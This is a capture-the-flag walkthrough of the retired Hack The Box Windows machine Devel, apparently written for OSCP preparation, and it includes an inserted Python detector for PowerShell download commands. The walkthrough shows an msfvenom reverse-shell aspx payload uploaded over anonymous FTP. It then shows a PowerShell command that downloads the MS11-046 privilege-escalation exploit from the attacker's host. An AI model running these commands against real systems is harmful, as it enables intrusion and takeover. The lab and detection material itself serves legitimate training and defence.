OSCP PREPARATIONS – HTB Devel

Devel is a deliberately vulnerable Windows machine found among the retired machines. The goal is to obtain the user and root flags by using its vulnerabilities.
We start with an nmap scan to get to know the target machine.
Classic Scan

Full Port Scan

The port scan showed two open ports: 21/tcp (ftp, Microsoft ftpd) and 80/tcp (http, Microsoft IIS httpd 7.5).
The nmap output also showed that anonymous login is allowed on the FTP port.
We logged in with the credentials anonymous:anonymous.

(Different users have added their own shells here as they solved the machine.)

In the FTP listing we see welcome.png and the aspnet_client directory.
Let’s go to welcome.png and take a look.

While scanning with Gobuster, we detected the /aspnet_client directory.

This confirms that the web server serves its content from the FTP directory. Let’s upload a file over FTP with put and then browse to it.

Let’s go to this directory.

When we go to the directory, we see the note we wrote in it, so let’s try to upload and run our shell here.

We create the payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.19 LPORT=4747 -o maygun.aspx

We uploaded our aspx file to the FTP server.

We run our payload by triggering it via the browser.

That’s how we got our shell.
This shell has limited privileges.

We use the systeminfo command to get information about the system.

The system runs Windows 7 Enterprise Build 7600; let’s see if there is a vulnerability related to this.

We found local privilege escalation vulnerabilities.

Let’s get the exploit from searchsploit.

The comments in the exploit source describe how to compile it.
We set up a web server with Python and then executed the following command on the Windows machine:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.19:8000/MS11-046.exe', 'c:\Users\Public\Downloads\MS11-046.exe')"
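The download step above is visible to defenders wherever process command lines are logged. The following is an added detection example, not part of the original write-up: it flags PowerShell WebClient.DownloadFile command lines and scores the URL and destination. The sample command lines, host names, reason labels and path lists are constructed assumptions.

```python
import re

# Constructed CommandLine values as recorded by process-creation logging
# (documentation IP address, hypothetical host and file names).
SAMPLE_CMDLINES = [
    "powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://203.0.113.7:8000/tool.exe', 'c:\\Users\\Public\\Downloads\\tool.exe')\"",
    "powershell.exe -NoProfile -Command \"Get-ChildItem C:\\inetpub\\logs\"",
    "PowerShell -c \"(New-Object Net.WebClient).DownloadFile('https://updates.example.com/agent.msi','C:\\Windows\\Temp\\agent.msi')\"",
]

Q = "'\"\u2018\u2019\u201c\u201d"  # straight and typographic quotes, both appear in pasted commands
CRADLE = re.compile(
    r"net\.webclient\s*\)?\s*\.\s*downloadfile\s*\(\s*[%s]([^%s]+)[%s]\s*,\s*[%s]([^%s]+)[%s]"
    % ((Q,) * 6), re.I)
RAW_IP = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I)
EXEC_EXTS = (".exe", ".dll", ".msi", ".ps1", ".bat", ".scr")
WRITABLE = ("\\users\\public\\", "\\windows\\temp\\", "\\appdata\\", "\\programdata\\")

def analyze(cmdline):
    """Return url, destination and risk reasons for a DownloadFile call, or None if absent."""
    m = CRADLE.search(cmdline)
    if not m:
        return None
    url, dest = m.group(1), m.group(2)
    reasons = []
    if url.lower().startswith("http://"):
        reasons.append("plain-http")          # unencrypted transfer
    if RAW_IP.match(url):
        reasons.append("raw-ip-host")         # no DNS name, typical of ad-hoc servers
    if dest.lower().endswith(EXEC_EXTS):
        reasons.append("executable-payload")
    if any(p in dest.lower() for p in WRITABLE):
        reasons.append("user-writable-path")  # writable without administrative rights
    return {"url": url, "dest": dest, "reasons": reasons}

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyze(line))
```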

We ran MS11-046.exe where we obtained the nt authority\system user.

This way we got our user and root flags.
